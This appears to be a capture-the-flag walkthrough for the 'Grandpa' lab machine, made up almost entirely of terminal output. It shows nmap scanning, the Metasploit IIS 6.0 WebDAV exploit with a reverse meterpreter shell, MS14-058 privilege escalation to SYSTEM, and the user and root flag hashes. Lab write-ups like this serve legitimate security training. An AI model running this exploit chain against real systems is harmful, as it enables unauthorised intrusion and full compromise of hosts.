1
 2
 3
 4
 5
 6
 7
 8
 9
10

$ nmap -sV -O -F -oA Grandpa --version-light 10.10.10.14     
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:19 CST
Nmap scan report for 10.10.10.14
Host is up (0.34s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP (92%)

1
2
3

$ nmap -p 80 --script vuln 10.10.10.14               
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:20 CST
[1]    2261 segmentation fault  nmap -p 80 --script vuln 10.10.10.14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

$ searchsploit IIS 6.0  
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal I | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Wind | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Sta | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Re | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStorageP | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8806.pl
Microsoft IIS 6.0/7.5 (+ PHP) - Multip | exploits/windows/remote/19033.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result

1
2
3
4
5
6
7
8

msf5 > search ScStorageP

Matching Modules
================

   ##  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes     Microsoft IIS WebDav ScStoragePathFromUrl Overflow

1

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
RHOSTS => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options 


msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.16:4444 

1
2

meterpreter > background 
[*] Backgrounding session 2...

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2 
SESSION => 2
msf5 post(multi/recon/local_exploit_suggester) > run

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

1
2
3
4
5
6
7
8

msf5 post(multi/recon/local_exploit_suggester) > search ms14_058

Matching Modules
================

   ##  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  exploit/windows/local/ms14_058_track_popup_menu  2014-10-14       normal  Yes    Windows TrackPopupMenu Win32k NULL Pointer Dereference

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
msf5 exploit(windows/local/ms14_058_track_popup_menu) > show options 

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 2 
SESSION => 2
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.123.40:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions -i 2

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 180   1812  notepad.exe        x86   0                                      C:\WINDOWS\system32\notepad.exe
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 588   396   svchost.exe                                                     
 680   396   svchost.exe                                                     
 736   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1084  396   cisvc.exe                                                       
 1124  396   svchost.exe                                                     
 1180  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1328  396   VGAuthService.exe                                               
 1408  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1596  396   svchost.exe                                                     
 1700  396   alg.exe                                                         
 1812  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1912  396   dllhost.exe                                                     
 1940  348   logon.scr                                                       
 2156  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2304  588   wmiprvse.exe                                                    
 3384  1456  w3wp.exe                                                        
 3540  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3712  2156  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 3896  1084  cidaemon.exe                                                    
 3940  1084  cidaemon.exe                                                    
 3964  1084  cidaemon.exe 

meterpreter > migrate 1812
[*] Migrating from 3792 to 1812...
[*] Migration completed successfully.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(windows/local/ms14_058_track_popup_menu) > show options 

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.16      yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lport 4444
lport => 4444
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Launching notepad to host the exploit...
[+] Process 180 launched.
[*] Reflectively injecting the exploit DLL into 180...
[*] Injecting exploit into 180...
[*] Exploit injected. Injecting payload into 180...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.16:4444 -> 10.10.10.14:1034) at 2019-10-29 09:39:38 +0800

meterpreter > shell
Process 568 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119

C:\WINDOWS\system32>cd ../../
cd ../../

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  04:32 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:18 PM    <DIR>          Program Files
12/24/2017  07:27 PM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,091,200,512 bytes free

C:\>cd Documents and Settings
cd Documents and Settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,091,196,416 bytes free

C:\Documents and Settings>cd Harry
cd Harry

C:\Documents and Settings\Harry>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Harry

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:32 PM    <DIR>          Desktop
04/12/2017  04:32 PM    <DIR>          Favorites
04/12/2017  04:32 PM    <DIR>          My Documents
04/12/2017  03:42 PM    <DIR>          Start Menu
04/12/2017  03:44 PM                 0 Sti_Trace.log
               1 File(s)              0 bytes
               6 Dir(s)  18,091,196,416 bytes free

C:\Documents and Settings\Harry>cd Desktop
cd Desktop

C:\Documents and Settings\Harry\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Harry\Desktop

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:32 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,091,196,416 bytes free

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\Documents and Settings\Harry\Desktop>cd ../../
cd ../../

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,091,192,320 bytes free

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator\Desktop

04/12/2017  04:28 PM    <DIR>          .
04/12/2017  04:28 PM    <DIR>          ..
04/12/2017  04:29 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,091,192,320 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b